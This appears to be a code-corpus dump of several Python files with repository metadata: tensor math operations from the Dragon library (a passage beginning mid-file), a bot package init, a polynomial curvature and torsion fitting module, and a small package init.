The output tensor.
"""
return _unary_func(input, 'Exp', out)
def floor(input, out=None):
r"""Compute the largest integer not greater than input.
.. math:: \text{out} = \lfloor \text{input} \rfloor
Examples:
```python
x = torch.tensor([0.9, 1.4, 1.9])
print(torch.floor(x)) # [0., 1., 1.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Floor', out)
def ge(input, other, out=None):
r"""Compute the element-wise greater-equal comparison.
.. math:: \text{out} = (\text{input} \geq \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'GreaterEqual', out)
def gt(input, other, out=None):
r"""Compute the element-wise greater comparison.
.. math:: \text{out} = (\text{input} > \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output byte tensor.
"""
return _binary_func(input, other, 'Greater', out)
def isfinite(input):
r"""Check if the elements of input are finite.
.. math:: \text{out} = \text{isfinite}(\text{input})
Examples:
```python
x = torch.tensor([0., float('nan'), float('inf')])
print(torch.isfinite(x)) # [True, False, False]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'IsFinite')
def isinf(input):
r"""Check if the elements of input are infinite.
.. math:: \text{out} = \text{isinf}(\text{input})
Examples:
```python
x = torch.tensor([0., 1., float('inf')])
print(torch.isinf(x)) # [False, False, True]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'IsInf')
def isnan(input):
r"""Check if the elements of input are NaN.
.. math:: \text{out} = \text{isnan}(\text{input})
Examples:
```python
x = torch.tensor([0., 1., float('nan')])
print(torch.isnan(x)) # [False, False, True]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'IsNaN')
def le(input, other, out=None):
r"""Compute the element-wise less-equal comparison.
.. math:: \text{out} = (\text{input} \leq \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output byte tensor.
"""
return _binary_func(input, other, 'LessEqual', out)
def log(input, out=None):
r"""Compute the natural logarithm of input.
.. math:: \text{out} = \log(\text{input})
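Examples:
```python
x = torch.tensor([1., math.e])
print(torch.log(x))  # [0., 1.]
```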
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Log', out)
def logical_and(input, other, out=None):
r"""Compute the element-wise AND logical operation.
.. math:: \text{out} = \text{input} \mathbin{\&} \text{other}
Examples:
```python
a = torch.tensor([False, True, False, True])
b = torch.tensor([False, True, True, False])
c = torch.Tensor([0, 1, 0, 2])
d = torch.Tensor([0, 3, 4, 0])
print(torch.logical_and(a, b)) # [False, True, False, False]
print(torch.logical_and(c, d)) # [False, True, False, False]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'And', out)
def logical_not(input, out=None):
r"""Compute the element-wise NOT logical operation.
.. math:: \text{out} = \,\,\sim \text{input}
Examples:
```python
a = torch.tensor([False, True, True])
b = torch.tensor([0, 1, 2])
print(torch.logical_not(a)) # [True, False, False]
print(torch.logical_not(b)) # [True, False, False]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Not', out)
def logical_or(input, other, out=None):
r"""Compute the element-wise OR logical operation.
.. math:: \text{out} = \text{input} \mathbin{|} \text{other}
Examples:
```python
a = torch.tensor([False, True, False, True])
b = torch.tensor([False, True, True, False])
c = torch.Tensor([0, 1, 0, 2])
d = torch.Tensor([0, 3, 4, 0])
print(torch.logical_or(a, b)) # [False, True, True, True]
print(torch.logical_or(c, d)) # [False, True, True, True]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Or', out)
def logical_xor(input, other, out=None):
r"""Compute the element-wise XOR logical operation.
.. math:: \text{out} = \text{input} \oplus \text{other}
Examples:
```python
a = torch.tensor([False, True, False, True])
b = torch.tensor([False, True, True, False])
c = torch.Tensor([0, 1, 0, 2])
d = torch.Tensor([0, 3, 4, 0])
print(torch.logical_xor(a, b)) # [False, False, True, True]
print(torch.logical_xor(c, d)) # [False, False, True, True]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Xor', out)
def logsumexp(input, dim, keepdim=False, out=None):
r"""Apply the composite of log, sum, and exp to input.
.. math:: \text{out}_{i} = \log\sum_{j}\exp(\text{input}_{ij})
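Examples:
```python
x = torch.tensor([[1., 2., 3.]])
print(torch.logsumexp(x, dim=1))  # [3.4076...]
```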
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]]
The dimension(s) to reduce.
keepdim : bool, optional, default=False
Whether the output tensor has dim retained or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return log(exp(input).sum(dim, keepdim), out)
def lt(input, other, out=None):
r"""Compute the element-wise less comparison.
.. math:: \text{out} = (\text{input} < \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output byte tensor.
"""
return _binary_func(input, other, 'Less', out)
def matmul(input, other, out=None):
r"""Compute the matrix multiplication.
.. math:: \text{out} = \text{input} \times \text{other}
The behavior depends on the shape of input tensors:
    * If both tensors are 1d, computes the dot product.
    * If the first tensor is 1d and the second is >=2d, computes the vector-matrix multiplication.
    * If the first tensor is >=2d and the second is 1d, computes the matrix-vector multiplication.
    * If both tensors are >=2d, computes the matrix-matrix multiplication.
    * If one tensor is >=3d, applies batching and broadcasting to the computation.
Examples:
```python
# Vector x Vector
a = torch.ones(2)
b = torch.ones(2)
print(torch.matmul(a, b))
# Vector x Matrix
a = torch.ones(2)
b = torch.ones(2, 3)
print(torch.matmul(a, b))
# Matrix x Vector
a = torch.ones(3, 2)
b = torch.ones(2)
print(torch.matmul(a, b))
# Matrix x Matrix
a = torch.ones(2, 3)
b = torch.ones(3, 2)
print(torch.matmul(a, b))
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : dragon.vm.torch.Tensor
The tensor to multiply.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'MatMul', input.device, [input, other], outputs=[out])
def max(input, dim=None, keepdim=False, out=None):
"""Compute the max value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
# A negative dimension is the last-k dimension
print(torch.max(x, dim=1))
print(torch.max(x, dim=-1)) # Equivalent
# If dimension is None, reduce input as a vector
# and return a scalar result
print(torch.max(x)) # 6
# Also, dimension could be a sequence of integers
print(torch.max(x, (0, 1))) # 6
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
'ReduceMax', input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def maximum(input, other, out=None):
r"""Compute the maximum value of inputs.
.. math:: \text{out} = \max(\text{input}, \text{other})
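    Examples:
    ```python
    # Minimal sketch; inputs broadcast element-wise.
    a = torch.tensor([1, 2, 3])
    b = torch.tensor([3, 2, 1])
    print(torch.maximum(a, b))  # [3, 2, 3]
    ```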
Parameters
----------
input : Union[dragon.vm.torch.Tensor, number]
The first input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Maximum', out)
def mean(input, dim=None, keepdim=False, out=None):
"""Compute the mean value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
# A negative dimension is the last-k dimension
print(torch.mean(x, dim=1))
print(torch.mean(x, dim=-1)) # Equivalent
# If dimension is None, reduce input as a vector
# and return a scalar result
print(torch.mean(x)) # 3.5
# Also, dimension could be a sequence of integers
print(torch.mean(x, dim=(0, 1))) # 3.5
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
'ReduceMean', input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def min(input, dim=None, keepdim=False, out=None):
"""Compute the min value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
# A negative dimension is the last-k dimension
print(torch.min(x, dim=1))
print(torch.min(x, dim=-1)) # Equivalent
# If dimension is None, reduce input as a vector
# and return a scalar result
print(torch.min(x)) # 1
# Also, dimension could be a sequence of integers
print(torch.min(x, (0, 1))) # 1
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
'ReduceMin', input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def minimum(input, other, out=None):
r"""Compute the minimum value of inputs.
.. math:: \text{out} = \min(\text{input}, \text{other})
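    Examples:
    ```python
    # Minimal sketch; inputs broadcast element-wise.
    a = torch.tensor([1, 2, 3])
    b = torch.tensor([3, 2, 1])
    print(torch.minimum(a, b))  # [1, 2, 1]
    ```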
Parameters
----------
input : Union[dragon.vm.torch.Tensor, number]
The first input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Minimum', out)
def mm(input, mat2, out=None):
r"""Compute the matrix-matrix multiplication.
.. math:: \text{out} = \text{input} \times \text{mat2}
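    Examples:
    ```python
    # Minimal sketch; both arguments must be 2d matrices.
    a = torch.ones(2, 3)
    b = torch.ones(3, 2)
    print(torch.mm(a, b))  # 2x2 matrix filled with 3.
    ```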
Parameters
----------
input : dragon.vm.torch.Tensor
The first matrix.
mat2 : dragon.vm.torch.Tensor
The second matrix.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'Gemm', input.device, [input, mat2], outputs=[out])
def mul(input, other, out=None):
r"""Compute the element-wise multiplication.
.. math:: \text{out} = \text{input} \times \text{other}
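    Examples:
    ```python
    # Minimal sketch; `other` may be a tensor or a number.
    a = torch.tensor([1., 2., 3.])
    print(torch.mul(a, 2))  # [2., 4., 6.]
    print(torch.mul(a, a))  # [1., 4., 9.]
    ```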
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to multiply.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Mul', out)
def ne(input, other, out=None):
r"""Compute the element-wise not-equal comparison.
.. math:: \text{out} = (\text{input} \neq \text{other})
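    Examples:
    ```python
    # Minimal sketch; `other` may be a tensor or a number.
    a = torch.tensor([1, 2, 3])
    print(torch.ne(a, 2))  # [True, False, True]
    ```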
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output byte tensor.
"""
return _binary_func(input, other, 'NotEqual', out)
def neg(input, out=None):
r"""Compute the element-wise negative.
.. math:: \text{out} = -\text{input}
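    Examples:
    ```python
    # Minimal sketch.
    x = torch.tensor([-1, 0, 2])
    print(torch.neg(x))  # [1, 0, -2]
    ```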
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Neg', out)
def norm(input, p='fro', dim=None, keepdim=False, out=None, dtype=None):
"""Compute the norm value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
    # A negative dimension is the last-k dimension
print(torch.norm(x, dim=1))
print(torch.norm(x, dim=-1)) # Equivalent
# If ``dim`` is None, the vector-style reduction
# will be applied to return a scalar result
print(torch.norm(x)) # 9.539
# Also, ``dim`` could be a sequence of integers
print(torch.norm(x, dim=(0, 1))) # 9.539
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
p : {'fro', 1, 2}, optional
The norm order.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
dtype : str, optional
The data type to cast to.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
if p is None or p == 2 or p == 'fro':
op_type = 'ReduceL2'
elif p == 1:
op_type = 'ReduceL1'
else:
raise ValueError('Unsupported norm order: ' + str(p))
input = input.to(dtype=dtype)
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
op_type, input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def pow(input, exponent, out=None):
r"""Compute the power of input.
.. math:: \text{out} = \text{input}^{\text{exponent}}
    The two inputs are broadcast against each other:
```python
x = torch.tensor([[2, 2]])
print(torch.pow(x, x)) # [[4, 4]]
print(torch.pow(x, 3)) # [[8, 8]]
print(torch.pow(3, x)) # [[9, 9]]
```
Parameters
----------
input : Union[dragon.vm.torch.Tensor, number]
The input tensor.
exponent : Union[dragon.vm.torch.Tensor, number]
The exponent tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, exponent, 'Pow', out)
def reciprocal(input, out=None):
r"""Compute the reciprocal of input.
.. math:: \text{out} = \frac{1}{\text{input}}
Examples:
```python
x = torch.tensor([0., 1., 2.])
print(torch.reciprocal(x)) # [inf, 1., 0.5]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Reciprocal', out)
def round(input, out=None):
r"""Compute the nearest integer of input.
.. math:: \text{out} = \lfloor \text{input} \rceil
Examples:
```python
x = torch.tensor([0.9, 1.4, 1.9])
print(torch.round(x)) # [1., 1., 2.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Round', out)
def rsqrt(input, out=None):
r"""Compute the reciprocal square root of input.
.. math:: \text{out} = \frac{1}{\sqrt{\text{input}}}
Examples:
```python
x = torch.tensor([0., 4., 16.])
print(torch.rsqrt(x)) # [inf, 0.5, 0.25]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Rsqrt', out)
def sign(input, out=None):
r"""Compute the sign indication of input.
.. math::
\text{out}_{i} =
\begin{cases}
-1, & \text{ if } \text{input}_{i} < 0 \\
0, & \text{ if } \text{input}_{i} = 0 \\
1, & \text{ if } \text{input}_{i} > 0
\end{cases}
Examples:
```python
x = torch.tensor([-2, 0, 2])
print(torch.sign(x)) # [-1, 0, 1]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Sign', out)
def sin(input, out=None):
r"""Compute the sin of input.
.. math:: \text{out} = \sin(\text{input})
Examples:
```python
x = torch.tensor([0., math.pi / 2])
print(torch.sin(x)) # [0., 1.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Sin', out)
def sqrt(input, out=None):
r"""Compute the square root of input.
.. math:: \text{out} = \sqrt{\text{input}}
Examples:
```python
x = torch.tensor([4., 9., 16.])
print(torch.sqrt(x)) # [2., 3., 4.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Sqrt', out)
def square(input, out=None):
r"""Compute the square of input.
.. math:: \text{out} = \text{input}^{2}
Examples:
```python
x = torch.tensor([2., 3., 4.])
print(torch.square(x)) # [4., 9., 16.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Square', out)
def sub(input, other, out=None):
r"""Compute the element-wise subtraction.
.. math:: \text{out} = \text{input} - \text{other}
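    Examples:
    ```python
    # Minimal sketch; `other` may be a tensor or a number.
    a = torch.tensor([1, 2, 3])
    print(torch.sub(a, 1))  # [0, 1, 2]
    ```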
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to subtract.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Sub', out)
def sum(input, dim=None, keepdim=False, out=None):
"""Compute the sum value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
# A negative dimension is the last-k dimension
print(torch.sum(x, dim=1))
print(torch.sum(x, dim=-1)) # Equivalent
# If dimension is None, reduce input as a vector
# and return a scalar result
print(torch.sum(x)) # 21
# Also, dimension could be a sequence of integers
print(torch.sum(x, (0, 1))) # 21
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
'ReduceSum', input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def _binary_func(input, value, op_type, out=None):
"""Compute a binary function."""
input, value = constant_ops.remove_scalars(input, value)
return Function.apply(
op_type, input.device, [input, value], outputs=[out])
def _unary_func(input, op_type, out=None):
"""Compute an unary function."""
return Function.apply(
op_type, input.device, [input], outputs=[out])
| 23.753079
| 87
| 0.583409
| 4,969
| 38,575
| 4.500906
| 0.065607
| 0.113615
| 0.108697
| 0.157165
| 0.834652
| 0.806081
| 0.768791
| 0.728147
| 0.705924
| 0.653163
| 0
| 0.013368
| 0.263072
| 38,575
| 1,623
| 88
| 23.767714
| 0.773384
| 0.694284
| 0
| 0.157143
| 0
| 0
| 0.045577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.266667
| false
| 0
| 0.028571
| 0
| 0.561905
| 0.004762
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
e3a9b81e82e2fc1d728762e2fa3fd57a408e7d85
| 702
|
py
|
Python
|
moca_bot/__init__.py
|
el-ideal-ideas/MendakoDiscordBot
|
bc9fe8e85465671a509bee701b5f8eee9a6044d3
|
[
"MIT"
] | 1
|
2020-07-09T06:48:45.000Z
|
2020-07-09T06:48:45.000Z
|
moca_bot/__init__.py
|
el-ideal-ideas/ShirotakoDiscordBot
|
432b998b1ba255b6c626f3297fc92d3be0159ed1
|
[
"MIT"
] | null | null | null |
moca_bot/__init__.py
|
el-ideal-ideas/ShirotakoDiscordBot
|
432b998b1ba255b6c626f3297fc92d3be0159ed1
|
[
"MIT"
] | null | null | null |
# Ω*
# ■ ■■■■■
# ■ ■■ ■■
# ■ ■■ ■
# ■ ■■
# ■■■■■ ■ ■■■
# ■■ ■■ ■ ■■■
# ■■ ■■ ■ ■■■■
# ■■ ■■ ■ ■■■■
# ■■■■■■■■■ ■ ■■■
# ■■ ■ ■■
# ■■ ■ ■■
# ■■ ■ ■ ■■ ■■
# ■■ ■■ ■ ■■■ ■■■ ■■
# ■■■■■ ■ ■■■ ■■■■■
# -- Imports --------------------------------------------------------------------------
from .MocaBot import MocaBot
# -------------------------------------------------------------------------- Imports --
| 30.521739
| 87
| 0.055556
| 56
| 702
| 2.678571
| 0.196429
| 0.24
| 0.233333
| 0.12
| 0.253333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.542735
| 702
| 22
| 88
| 31.909091
| 0.121495
| 0.903134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5836de3345e28c47521d4611d447b6bd39a7ead7
| 2,638
|
py
|
Python
|
SSnet_GNN/code/pnfit.py
|
ekraka/SSnet
|
6a28140b2e54e5415553609a612fcae92f9103f0
|
[
"MIT"
] | 20
|
2020-01-23T07:29:27.000Z
|
2022-03-22T12:38:33.000Z
|
SSnet_GNN/code/pnfit.py
|
ekraka/SSnet
|
6a28140b2e54e5415553609a612fcae92f9103f0
|
[
"MIT"
] | 3
|
2020-05-19T18:43:19.000Z
|
2021-07-30T16:13:48.000Z
|
SSnet_GNN/code/pnfit.py
|
ekraka/SSnet
|
6a28140b2e54e5415553609a612fcae92f9103f0
|
[
"MIT"
] | 5
|
2020-02-07T18:55:23.000Z
|
2021-07-15T01:43:47.000Z
|
# curvature/torsion calculation of a polynomial-fitted axis line
# 2nd, 3rd and 5th order polynomials
from math import *
from utils import *
#5th order
def pfit(fth,t):
nf=len(fth)
o=nf-1
L=t
A=fth
# for a in A:
# print a
    # for each point
    D1,D2,D3=[],[],[]
    kapa,tora=[],[]
    crds=[]
    for r in range(L):
        # each point has xyz coordinates
d1,d2,d3=[],[],[]
crd=[]
t=r+1
for i in range(3):
# for j in range(3):
ca=A[i]
# print ca
d1.append(ca[1]+ca[2]*t*2+ca[3]*t*t*3+ca[4]*t**3*4+ca[5]*t**4*5)
d2.append(ca[2]*2+ca[3]*t*6+ca[4]*t**2*12+ca[5]*t**3*20)
d3.append(ca[3]*6+ca[4]*t*12*2+ca[5]*t**2*20*3)
crd.append(ca[0]+ca[1]*t+ca[2]*t**2+ca[3]*t**3+ca[4]*t**4+ca[5]*t**5)
D1.append(d1)
D2.append(d2)
D3.append(d3)
# print crd
# print d1
dcf=[]
kap=curv(d1,d2)
tor=tors(d1,d2,d3)
kapa.append(kap)
tora.append(tor)
# print 'cur'
# for a in kapa:
# print a
# print 'tor'
# for a in tora:
# print a
return([kapa,tora])
#3rd order
def pfit3(fth,t):
nf=len(fth)
o=nf-1
L=t
A=fth
# for a in A:
# print a
    # for each point
    D1,D2,D3=[],[],[]
    kapa,tora=[],[]
    crds=[]
    for r in range(L):
        # each point has xyz coordinates
d1,d2,d3=[],[],[]
crd=[]
t=r+1
for i in range(3):
# for j in range(3):
ca=A[i]
# print ca
d1.append(ca[1]+ca[2]*t*2+ca[3]*t*t*3)
d2.append(ca[2]*2+ca[3]*t*6)
d3.append(ca[3]*6)
crd.append(ca[0]+ca[1]*t+ca[2]*t**2+ca[3]*t**3)
D1.append(d1)
D2.append(d2)
D3.append(d3)
# print crd
# print d1
dcf=[]
kap=curv(d1,d2)
tor=tors(d1,d2,d3)
kapa.append(kap)
tora.append(tor)
# print 'cur'
# for a in kapa:
# print a
# print 'tor'
# for a in tora:
# print a
return([kapa,tora])
#2nd order
def pfit2(fth,t):
nf=len(fth)
o=nf-1
L=t
A=fth
# for a in A:
# print a
    # for each point
    D1,D2,D3=[],[],[]
    kapa,tora=[],[]
    crds=[]
    for r in range(L):
        # each point has xyz coordinates
d1,d2,d3=[],[],[]
crd=[]
t=r+1
for i in range(3):
# for j in range(3):
ca=A[i]
# print ca
d1.append(ca[1]+ca[2]*t*2)
d2.append(ca[2]*2)
d3.append(0.)
crd.append(ca[0]+ca[1]*t+ca[2]*t**2)
D1.append(d1)
D2.append(d2)
D3.append(d3)
# print crd
# print d1
dcf=[]
kap=curv(d1,d2)
tor=tors(d1,d2,d3)
kapa.append(kap)
tora.append(tor)
# print 'cur'
# for a in kapa:
# print a
# print 'tor'
# for a in tora:
# print a
return([kapa,tora])
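# Usage sketch (hypothetical, not part of the original script):
# `fth` holds three coefficient lists [c0, ..., cN] in ascending order,
# one per x/y/z axis, and `t` is the number of points sampled along the
# fitted axis; `curv` and `tors` are assumed to come from the local
# `utils` module imported above.
#
#   coeffs = [cx, cy, cz]               # e.g. from a least-squares polynomial fit
#   kappa, torsion = pfit3(coeffs, 10)  # per-point curvature/torsion lists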
| 17.586667
| 77
| 0.5163
| 504
| 2,638
| 2.702381
| 0.132937
| 0.044053
| 0.039648
| 0.044053
| 0.844347
| 0.812041
| 0.812041
| 0.812041
| 0.812041
| 0.787078
| 0
| 0.080755
| 0.277104
| 2,638
| 149
| 78
| 17.704698
| 0.633456
| 0.286581
| 0
| 0.795181
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036145
| false
| 0
| 0.024096
| 0
| 0.060241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5843ede99ec5d1d77fd161b833769d92a95511d0
| 44
|
py
|
Python
|
pimux/__init__.py
|
azwyane/pymux
|
09fafc8c313a2c091efed6e9864a0273fe4c35c6
|
[
"MIT"
] | 30
|
2020-05-02T09:21:23.000Z
|
2022-03-24T12:59:09.000Z
|
pimux/__init__.py
|
azwyane/pymux
|
09fafc8c313a2c091efed6e9864a0273fe4c35c6
|
[
"MIT"
] | null | null | null |
pimux/__init__.py
|
azwyane/pymux
|
09fafc8c313a2c091efed6e9864a0273fe4c35c6
|
[
"MIT"
] | 9
|
2020-05-03T19:13:12.000Z
|
2021-03-08T07:21:59.000Z
|
from . import function
from . import Sensors
| 22
| 22
| 0.795455
| 6
| 44
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 2
| 23
| 22
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
